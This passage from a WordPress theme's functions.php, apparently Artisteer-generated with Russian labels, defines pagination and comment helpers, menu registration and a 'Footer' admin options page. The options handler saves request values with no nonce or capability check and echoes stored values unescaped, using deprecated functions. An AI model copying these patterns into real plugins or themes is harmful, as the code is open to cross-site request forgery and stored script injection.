        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
